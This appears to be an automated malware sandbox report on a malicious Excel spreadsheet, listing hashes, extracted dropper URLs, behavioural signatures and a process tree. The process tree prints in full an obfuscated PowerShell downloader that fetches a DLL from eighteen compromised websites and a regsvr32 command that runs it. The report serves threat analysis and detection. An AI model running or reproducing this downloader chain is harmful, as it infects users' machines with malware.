Overview

overview

10

Static

static

8

806f40b333...91.xls

windows7-x64

10

806f40b333...91.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 21:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    806f40b33359622f698ef99724429ce5fccdb7c6eb5f80c08fe5b0c16c026691.xls

  • Size

    438KB

  • MD5

    51d48cb8b00c400f00ed652b55bb8d42

  • SHA1

    3298d6364c03bc8d7991dffc44f6c22cd7ad79b3

  • SHA256

    806f40b33359622f698ef99724429ce5fccdb7c6eb5f80c08fe5b0c16c026691

  • SHA512

    56b1c94c3e3cb47ca0f0e97934642a3c7d151cbc527be8e8c37790024c4086ceb0cc5d3384dd6af4c9bc4abee38140b1ed4712dcdb2438d1464d8825d2c94f8b

  • SSDEEP

    12288:V947a/JjsLZjXYc7X0/aXCKli04OaZ1XSwbhF0:1urYc7E/i004OSLbhF0

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://wildmanwildfood.com/wp-admin/wxyadXKXFe/
exe.dropper

https://ashven.co.uk/wp-includes/UwBairqGXVb11tCu/
exe.dropper

https://aigenix.comartstudios.com/cgi-bin/ZZ8HCNr40H/
exe.dropper

https://fastonlineearn.com/wp-content/L/
exe.dropper

https://mbmscaffolding.co.uk/test/3j/
exe.dropper

https://ineslebuhan.com/wp-includes/7dLR8UB3RFfSHd4cZN/
exe.dropper

https://mccoygloballinks.com/cgi-bin/HvZWLrLljiRj2ck/
exe.dropper

http://lonaomer.com/wp-content/6G/
exe.dropper

https://tainformado.com.br/wp-content/0Ysot/
exe.dropper

https://nifdtb.in/wp-content/9uHo3GBgyIQ/
exe.dropper

https://sdn3sajen.stormapp.in/wp-admin/Xc6Z/
exe.dropper

https://narsanat.com/banner/TnIhz/
exe.dropper

https://vanessanascimento.com.br/auren-xbox/cDD2dfW/
exe.dropper

https://medvital.com.br/arquivos/q6ZjbPPoR7l/
exe.dropper

https://mcjalandhar.in/1950-kill/BMoLHJM4g/
exe.dropper

https://nuranabd.com/wp-content/BhYOZ2pJV5q/
exe.dropper

https://sdigitaltv.online/wp-admin/rpRCArrXjpoUXo/
exe.dropper

http://news.leta.com.vn/-/NQOY80o/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\806f40b33359622f698ef99724429ce5fccdb7c6eb5f80c08fe5b0c16c026691.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:636
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\etyockqw.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ghkid=('$MJXdfshDrfGZses4=\"https:dhjdhjwildmanwildfood.comdhjwp-admindhjwxyadXKXFedhjbouhttps:dhjdhjashven.co.ukdhjwp-includesdhjUwBairqGXVb11tCudhjbouhttps:dhjdhjaigenix.comartstudios.comdhjcgi-bindhjZZ8HCNr40Hdhjbouhttps:dhjdhjfastonlineearn.comdhjwp-contentdhjLdhjbouhttps:dhjdhjmbmscaffolding.co.ukdhjtestdhj3jdhjbouhttps:dhjdhjineslebuhan.comdhjwp-includesdhj7dLR8UB3RFfSHd4cZNdhjbouhttps:dhjdhjmccoygloballinks.comdhjcgi-bindhjHvZWLrLljiRj2ckdhjbouhttp:dhjdhjlonaomer.comdhjwp-contentdhj6Gdhjbouhttps:dhjdhjtainformado.com.brdhjwp-contentdhj0Ysotdhjbouhttps:dhjdhjnifdtb.indhjwp-contentdhj9uHo3GBgyIQdhjbouhttps:dhjdhjsdn3sajen.stormapp.indhjwp-admindhjXc6Zdhjbouhttps:dhjdhjnarsanat.comdhjbannerdhjTnIhzdhjbouhttps:dhjdhjvanessanascimento.com.brdhjauren-xboxdhjcDD2dfWdhjbouhttps:dhjdhjmedvital.com.brdhjarquivosdhjq6ZjbPPoR7ldhjbouhttps:dhjdhjmcjalandhar.indhj1950-killdhjBMoLHJM4gdhjbouhttps:dhjdhjnuranabd.comdhjwp-contentdhjBhYOZ2pJV5qdhjbouhttps:dhjdhjsdigitaltv.onlinedhjwp-admindhjrpRCArrXjpoUXodhjbouhttp:dhjdhjnews.leta.com.vndhj-dhjNQOY80odhj\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\priuwdogiuwdramiuwddatiuwda\irlkhkuw.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 32463){bReak;}}}').replace(\"dhj\",\"/\");iex $ghkid"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5040
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\regsvr32.exe /s c:\programdata\irlkhkuw.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • \??\c:\windows\syswow64\regsvr32.exe
          c:\windows\syswow64\regsvr32.exe /s c:\programdata\irlkhkuw.dll
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2068

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4eouvmq.n4j.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize

    3KB

    MD5

    17fd45bffc3f2cf9596e37b98149ca0c

    SHA1

    41841767e3a29251d867e8b294cd069b42a117cd

    SHA256

    5c1072fbd2d9de77941a203736c2a7d6059243b4d0a1d705068428a5ec92c570

    SHA512

    2327fb41d8574c0ced648ccc9530df1f0587340be1a0fd84987ded6dcff8df8b4efafb1d9c6186cb0170b152b3a630d1d5bc7d6530c48099908b1eb9da3ed958

    Download Submit

  • \??\c:\programdata\etyockqw.vbs
    Filesize

    2KB

    MD5

    a35f55cf91f2003615533b5be5948090

    SHA1

    b5b89075550e2592b69f4541cfbdf33dd8fbf175

    SHA256

    d297bdfe7fdf74ffe50cad7965843bb92cd55b44370e1b7b8ddb99cf7ab3af7c

    SHA512

    098097cd100b73f231b3c1bb3e8330a584b2b2742be8a27211ea9f9f7875c78b414341e626b5c071abc0589caf3a2ac80c99c79b952388cc96884fd33b397899

    Download Submit

  • \??\c:\programdata\irlkhkuw.dll
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/636-14-0x00007FFC39C70000-0x00007FFC39C80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-15-0x00007FFC39C70000-0x00007FFC39C80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-7-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-6-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-10-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-11-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-12-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-9-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-13-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-8-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-0-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-2-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-34-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-35-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-5-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-1-0x00007FFC7BE4D000-0x00007FFC7BE4E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/636-4-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/636-119-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-122-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-121-0x00007FFC7BE4D000-0x00007FFC7BE4E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/636-127-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-128-0x00007FFC7BDB0000-0x00007FFC7BFA5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/636-3-0x00007FFC3BE30000-0x00007FFC3BE40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5040-111-0x000001FD88E80000-0x000001FD88EA2000-memory.dmp

    Filesize

    136KB

    Download